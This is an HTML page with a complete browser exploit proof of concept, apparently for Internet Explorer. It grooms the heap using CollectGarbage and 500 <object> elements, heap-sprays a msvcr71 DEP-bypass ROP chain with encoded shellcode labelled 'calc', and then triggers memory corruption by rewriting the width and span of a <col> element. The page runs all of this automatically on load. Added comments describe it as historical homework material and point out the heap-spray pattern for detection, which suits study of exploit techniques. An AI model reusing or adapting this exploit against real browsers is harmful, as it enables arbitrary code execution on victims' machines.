<html>
<head></head>
<body>

<div id="evil"></div>

<script>


function exploit(){

	// Final step of this historical PoC: rewrites two attributes of the <col id="7">
	// element declared in the table below, after heapspray() has run. Both values are
	// hard-coded by the original author for one specific environment and carry no
	// general meaning; the script has no check that the earlier steps succeeded.
	var ex_obj = document.getElementById("7");
	// Original author's note: a "magic number" chosen for the address it produces;
	// the reasoning is said to be in the accompanying document, not here.
	ex_obj.width = 73769
	// Second hard-coded value; per the original note it changes where the crash occurs.
	ex_obj.span = 19; 
}


function heapspray() {

    // Heap-spray step of this historical PoC: concatenates the hard-coded constants
    // below into `data`, prefixes it to a large filler string, and keeps 100 copies of
    // the result alive in the global array `foo`. The constants are taken from a
    // third-party-generated chain for one specific DLL (per the original comment on
    // `mcrop`), so they are meaningless outside that exact environment.
    // Detection note: the repeated `str = str + str` doubling loops and the many
    // equal-length substr() allocations are the classic in-browser heap-spray pattern.

    // Filler: doubled below until it exceeds 100,000 UTF-16 code units.
    var str = "\u4141\u4141";
    var data = "\u7f98\u7c34"
    //msvcr71 dep bypass rop chain found in a blog..(generated by mona.py)
    var mcrop="\u6c0a\u7c34\ua140\u7c37\u591f\u7c37\u4141\u4141\u6c0a\u7c34\ua140\u7c37\u30ea\u7c35\u6c0b\u7c34\u6069\u7c37\u4141\u4141\u4141\u4141\u4141\u4141\u6402\u7c37\u5c30\u7c34\u6c0a\u7c34\ufcff\uffff\u1e05\u7c35\u4901\u7c35\uffff\uffff\u5255\u7c34\u2174\u7c35\ud201\u7c34\ub001\u7c38\ub8d7\u7c34\ub8d8\u7c34\u4f87\u7c34\uffc0\uffff\u1eb1\u7c35\u6c0a\u7c34\u9090\u9090\u8c81\u7c37";
    //shellcode we use in homework (the original comment below labels it "calc")
    var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");
    // Six repetitions of the same constant as `data` was initialised with.
    for(var i=0;i<6;i++){
    //rop nop(just ret)
        data=data+"\u7f98\u7c34";
    }
    //pop pop ret
    data=data+"\u10c2\u7c34"
    //stack pivot
    data=data+"\u8b05\u7c34"
    //first hit point here
    data=data+"\u0024\u0709"
    //dep bypass rop chain
    data=data+mcrop
    //calc shellcode
    data=data+shellcode
    while (str.length < 100000)
        str = str + str;
    
    // `data` goes first so it sits at the start of every sprayed copy.
    str=data+str;
    // Cut to a 64KB string (32768 UTF-16 code units take up 64KB of space, not
	// including the heap header, string length field and null terminator), then
    // double it until it reaches 16 * 64KB.
    //
    // Note that foo is a global variable, because it's not declared
    // with the var keyword. This will ensure that it will not be
    // garbage collected when the function returns.

    str = str.substr(0, 64*1024/2);
    while (str.length < 16*64*1024/2)
        str = str+str;

    // 100 copies, each slightly shorter than 16 * 64KB (the subtracted terms are the
    // original author's allowance for the string header and terminator).
    foo=new Array();
    for (var i=0;i<100;i++){
        foo[i]=str.substr(0,16*64*1024/2-32/2-4/2-2/2);
    }    
    
}


function start(){
    // Preparation step of this historical PoC, run synchronously at parse time: creates
    // 500 <object> elements inside the hidden #evil div together with two arrays of
    // 0x6d-character strings, then nulls fr[400..499] and forces a collection so that
    // freed slots remain. `fr`, `obj` and `cl` are implicit globals (no `var`), so they
    // survive after this function returns. CollectGarbage is a JScript/Internet
    // Explorer global; other engines have no such function, so this script fails there.
    // This part is from Michael Thompson. Thanks to him.
	var junk1 = "AAAA";
	var junk2 = "BBBB";
	var junk3 = "CCCC";
	var tag = "POPS";

	// Double each filler until it is at least 1000 characters long.
	while (junk1.length < 1000) junk1 += junk1;
	while (junk2.length < 1000) junk2 += junk2;
	while (junk3.length < 1000) junk3 += junk3;

	var love = tag + junk1;
	var hate = tag + junk3; // unused below
	var calm = tag + junk2;

	fr = new Array();
	obj = new Array();
	cl = new Array();
    
    // Container for the <object> elements; hidden so nothing is rendered.
	var div_container = document.getElementById("evil");
	div_container.style.cssText = "display:none";
	
	// Collect first, before any of the allocations below (original note: "very important").
    CollectGarbage();
    // Original author's sizing notes: SPAN object size 0x1c*8 = 0xE0; CObject size 0xE0;
    // string size (0xE0-6)/2 = 0x6d. These are environment-specific figures, not
    // something this file verifies.
	for(var i = 0; i < 500; i++ ) {

		obj[i] = document.createElement("object");
		div_container.appendChild(obj[i]);
		fr[i] = love.substring(0,0x6d);
		cl[i] = calm.substring(0,0x6d);
	}
	
	// Release the last 100 strings so the collector below can free their slots
	// ("holes" in the original author's wording).
	for(i = 400; i < 500; i++){	
		fr[i] = null;
	}
	CollectGarbage();
}

// Run the preparation step now, while the document is still being parsed; the
// <table>/<col id="7"> that exploit() later reads follows this script in the document.
start();
</script>

<table style="table-layout:fixed" >
 <col id="7" width="41" span="8" >AAAAA</col> 
</table>

<script>
// Second stage, scheduled after parsing: heapspray() at 400 ms, then exploit() at
// 700 ms. The original author notes the 700 ms delay is tuned so the spray finishes
// first; there is no completion check, so the ordering is timing-dependent and the
// delays may need adjusting per environment.
setTimeout(function(){heapspray()},400);
setTimeout(function(){exploit()},700);

</script>

</body>
</html>